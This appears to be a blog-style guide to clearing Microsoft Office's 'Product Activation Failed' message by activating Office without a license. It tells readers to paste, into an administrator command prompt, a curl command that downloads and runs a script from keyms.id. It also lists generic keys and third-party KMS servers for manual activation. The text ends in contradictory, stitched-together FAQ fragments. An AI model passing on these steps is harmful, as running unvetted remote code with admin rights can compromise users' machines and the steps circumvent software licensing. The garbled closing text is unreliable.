When you open an Office application such as Microsoft Word to type, a notification often appears in WordProduct Activation Failed. If you experience this, don’t panic because in this article we will discuss how to deal with Ms WordProduct Activation Failedin Microsoft Office 2016, 2019 or 2021.
In general Word applications that appear captionsProduct Activation Failedcan no longer be used to type or edit documents. Apart from that, this actually doesn’t only happen to Microsoft Word, but to all Office applications installed on your laptop, such as Excel, PowerPoint and others.
In other words, all Office products such as Word, Excel, PPT, and others will be deactivated and all of their features will be disabled. This of course will be a serious problem because it can interfere with your work using Microsoft Office applications. If that’s the case, then of course you should immediately repair Microsoft WordProduct Activation Failedso that you can return to using the Office applications on your laptop.
Causes of Product Activation Failed in Microsoft Office
As is well known, Microsoft Office applications need to be activated so they can continue to be used. If you do not activate, then applications such as Word, Excel, PPT and other Office products will no longer be able to be used after the trial period ends.
To activate, an Office license is required, according to the version of Office used. However, if you don’t have an original Office license, then the most common way to activate Microsoft Office is to use an activator, either using the KMS application or by online activation using CMD.
So, if you activate using an activator, in general the active period is only 180 days or 6 months. If it’s been 6 months, then the Microsoft Office application needs to be reactivated.
If you don’t reactivate it, then a problem occurs where in Word, Excel, PPT, and other applications a description appearsProduct Activation Failed. Thus, it happenedProduct Activation Failedis because the active period of Office on your laptop has expired and no re-activation has been carried out.
So, how to get rid ofProduct Activation Failedin Microsoft Office Word, Excel, PowerPoint and others is by activating Office.
How to Overcome Word Product Activation Failed with Free Activation Without Software
As said before that to overcome or eliminateProduct Activation Failedin Word, Excel, and PPT is by activating it. There are various activation methods that you can do, but the easiest is without software using CMD.
This method is of course very easy and practical because you don’t have to bother downloading crack applications like KMS Pico or KMS Auto. You only need to use the built-in tool which is sure to exist on all Windows, namely CMD.
You can do this method on Windows 7, Windows 8.1, Windows 10, or Windows 11. Apart from that, this method will work on Microsoft Office 2016, Office 2019, and Office 2021.
1. Activate Office Using CMD (Automatic Method)
The first way you can do to overcome WordProduct Activation Failedis by activating using CMD with an automatic method. The automatic method means that you only need to type one command line in CMD, and the activation process will take place automatically.
So, with this method you don’t need to type command lines in the CMD window. To overcome or improve Ms WordProduct Activation FailedUsing CMD, please follow these steps:
- First of all, make sure your laptop is connected to the internet because this is an online activation.
- If the laptop is connected to the internet, please open CMD as administrator (Run as administrator).
- Then, on windowsUser Account Controlplease clickYesto continue.
- Next, type or copy the following command then Paste in the CMD window that opens, then press Enter.
curl -L keyms.id/aso -o aso.cmd & aso.cmd
- After that, the Office activation process will take about 3 minutes, please wait for it to finish.
- If it is finished and successful, a description will appearProduct activation successful.
- Finally, please close the CMD window because the activation process is complete.
After you have carried out the very easy steps above, now your Office applications are back to normal. So, please reopen the Word, Excel or PPT application on your laptop. You will see that the Office application can be used again for typing and there is no more informationProduct Activation Failed.
2. Activate Office Using CMD (Manual Method)
Another way you can do to overcome OfficeProduct Activation Failedis to type all the codes for the necessary activation via CMD. So, in this manual method you have to type more code in the Command Prompt.
If you want to overcomeProduct Activation Failedby using this method, then please just follow the steps below:
- First of all, make sure your laptop is connected to the internet because this is online.
- If already connected, please open CMD and run as admin (Run as administrator).
- On the windowUser Account Controlappears, clickYesto continue.
- Next, type or Copy the following command and Paste it in the CMD window then press Enter.
cd %ProgramFiles%\Microsoft Office\Office16
- If the description appearsThe system cannot find the path specifiedtype or Copy the following command again and Paste it in CMD then press Enter.
cd %ProgramFiles(x86)%\Microsoft Office\Office16
- Next, type or Copy the following command and Paste it in CMD then press Enter.
for /f %x in ('dir /b ..\root\Licenses16\ProPlus*VL_KMS*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%x"
- After the previous process is complete, type or copy the following command again and paste it in CMD then press Enter.
cscript ospp.vbs /dstatus
- In the description that appears, pay attention to the last 5 characters in the lineLast 5 characters of installed product key.
- Then, type or copy the following code and paste in CMD, and change the last 5 characters then press Enter.
cscript ospp.vbs /unpkey:[last 5 characters]
- Repeat steps 7-9 until a description appearsNo installed product keys detectedcan only continue.
- Next, if you are using Office 2016, type or copy the following command and paste it in CMD then press Enter.
cscript ospp.vbs /inpkey:XQNVK-8JYDB-WJ9W3-YJ8YR-WFG99
- If using Office 2019, type or copy the following command and paste it in CMD then press Enter.
cscript ospp.vbs /inpkey:NMMKJ-6RK4F-KMJVX-8D9MJ-6MWKP
- If using Office 2021, type or copy the following command and paste it in CMD then press Enter.
cscript ospp.vbs /inpkey:FXYTK-NJJ8C-GB6DW-3DYQT-6F7TH
- After that, type or copy the following command again and paste it in CMD then press Enter.
cscript ospp.vbs /setprt:1688
- Then, type or copy the following command again and paste it in CMD then press Enter.
cscript ospp.vbs /sethst:e8.us.to
- Next, type or Copy the following command and Paste it in CMD then press Enter.
cscript ospp.vbs /act
- If the activation process is successful, a description will appearProduct activation successfullin the CMD window.
- Finally, please just close the CMD window because the activation is complete.
After you have carried out the activation steps above and the process was successful, now Microsoft Office Word, Excel and PPT no longer appearProduct Activation Failed.
If it doesn’t work and an error appears
When activating Office using the method above, it is possible for an error to occur which prevents Office from being activated successfully. One of the error codes that often appears when activating in the above way is error 0xC004F074.
If this error occurs, then you don’t need to panic because this is only caused by the KMS server being busy. You can simply re-run the command
cscript ospp.vbs /actin CMD until the activation process is successful. Please continue to repeat these steps until there are no more errors and a description appearssuccessfully.
But, if you have repeated it several times but still can’t succeed, then please run the command
cscript ospp.vbs /sethst:kms8.msguides.comon the CMD window. Then, please run the command again
cscript ospp.vbs /acton the CMD window.
Check Office Activation Status
After you have successfully activated using one of the methods above, the next step that should not be missed is to check the Office activation status. You need to do this check to find out whether your Microsoft Word, Excel and PPT are active or not.
If it turns out to be active, then the descriptionProduct Activation Failedit will no longer appear. To check the activation status of Microsoft Office, please follow the guide in the article on how to check if Office is active or not.
Check Office Active Period, Permanent or Not
Not only do you need to know the activation status of Microsoft Office, you also need to check the active period of your Microsoft Office. You have to do this check to find out whether your Office is permanently activated or not.
If it turns out that your Office is not permanent, then you can reactivate it before the active period expires. To check the active period of Microsoft Office, please follow the guide in the article on how to check the active period of Office.
That’s how to deal with Microsoft WordProduct Activation Failedin Office 2016, 2019, or 2021 for free and without software. So, if this notification appears in your Office application, then please do the method above to solve it. This method is of course very easy because there is no need to download an application, and it can also be done in Office 2016, 2019 and 2021.
You can open the Office app that you failed to activate. Click the Account Name option at the top-right corner and select Sign Out. Then you can sign in with the correct Microsoft account to see if the Office app can be successfully activated.How do I get rid of product activation failed Office 2016? ›
- Apply Some Preliminary Fixes. ...
- Don't Use a Cracked Version of Microsoft Office Apps. ...
- Don't Use a Pirated Copy of Windows. ...
- Ensure Your Subscription Hasn't Expired. ...
- Ensure You Are Logged Into the Correct Account. ...
- Ensure the Date Is Set Correctly.
- Log into your computer with an administrator account.
- Type into the search field. cmd.exe.
- Click with the right mouse button on cmd.exe and select “Run as Administrator”
- Change to the directory where Microsoft Office is installed. ...
- Enter. ...
- Finally enter.
This can happen if you don't uninstall the pre-installed version of Office on your new PC before installing a volume license version of Office. To stop the prompts for activation, make sure your Office uses volume licensing and then update the registry.